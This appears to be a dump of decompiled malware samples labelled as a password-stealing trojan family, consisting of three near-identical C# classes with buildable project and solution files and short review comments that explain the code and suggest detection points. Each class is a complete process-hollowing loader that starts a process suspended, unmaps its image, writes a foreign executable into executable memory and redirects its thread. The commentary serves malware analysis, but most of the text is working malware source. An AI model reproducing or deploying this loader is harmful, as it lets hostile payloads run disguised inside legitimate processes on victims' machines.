num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
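Review bot: `IX.R` carries no comment saying what it is, and the call sequence in this file is the well-known process-hollowing (RunPE) pattern, so a header comment would save the next analyst the reconstruction. The evidence is all in the body: `CreateProcess` with creation flag `4` (CREATE_SUSPENDED), `NtUnmapViewOfSection` on the image base read back from the child, `VirtualAllocEx` with `12288`/`64` (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), repeated `WriteProcessMemory`, then `SetThreadContext` and `ResumeThread`. I would add `// Process-hollowing loader: maps the PE image in 'bytes' into a suspended 'surrogateProcess' and redirects its primary thread` above the method. For detection, the same chain is the thing to key on: a child created suspended, followed by a cross-process unmap, an RWX allocation and a thread-context write from the parent. The IX.cs sections for assemblies 3porhvzz and 4tkhjivf further down appear to hold the same method and want the same comment.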
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>rern5947</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "rern5947", "Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.csproj", "{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 3porhvzz, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2697C77-1B71-47DF-A403-2C1EF862C8A2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
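Review bot: The bare offsets into `bytes` and into the thread-context array are undocumented, and they are what tie this method to 32-bit images and 32-bit target processes. `BitConverter.ToInt32(bytes, 60)` is `e_lfanew`, and the `+6`, `+40`, `+52`, `+80`, `+84` and `+248` reads line up with NumberOfSections, AddressOfEntryPoint, ImageBase, SizeOfImage, SizeOfHeaders and the first section header of a PE32 image; `new uint[179]` with `numArray1[0] = 65538U` matches an x86 CONTEXT requesting the integer registers, where index 41 is Ebx and index 44 is Eax. Inline comments such as `// numArray1[41] = CONTEXT.Ebx (PEB); +8 = PEB.ImageBaseAddress` and `// dst[3..5] = VirtualAddress, SizeOfRawData, PointerToRawData` would make that readable. None of these header fields is checked against `bytes.Length`, and the bare `catch` is the only thing that absorbs a malformed buffer, so a `false` return means an exception was thrown while `true` says nothing about whether any of the native calls succeeded.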
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{95BBF3DA-5600-478B-B7E9-A65E32249CD4}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>3porhvzz</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "3porhvzz", "Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.csproj", "{95BBF3DA-5600-478B-B7E9-A65E32249CD4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Debug|Any CPU.Build.0 = Debug|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Release|Any CPU.ActiveCfg = Release|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 4tkhjivf, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 655E4C02-E074-4FB9-AD93-32224C96B5B7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
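Review bot: Two things in this copy of `IX` mislead a reader skimming it and deserve a comment. `VirtualProtectEx` is declared but never called in the class, so triage based on the import list alone would over-report what `R` does, and `Convert.ToInt32((string) null, 2)` in the section-copy loop is just the constant 0 (that overload returns 0 for a null string). I would annotate them with `// declared but not used by R` and `// evaluates to 0: destination offset`. Separately, this class appears identical to the two earlier IX.cs sections apart from the assembly name and MVID in the decompiler header, so clustering these samples should rest on the P/Invoke set and the method body, not on the assembly name.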
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{181646B5-7CD1-4783-B41A-63E8BB743BAA}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>4tkhjivf</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "4tkhjivf", "Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.csproj", "{181646B5-7CD1-4783-B41A-63E8BB743BAA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal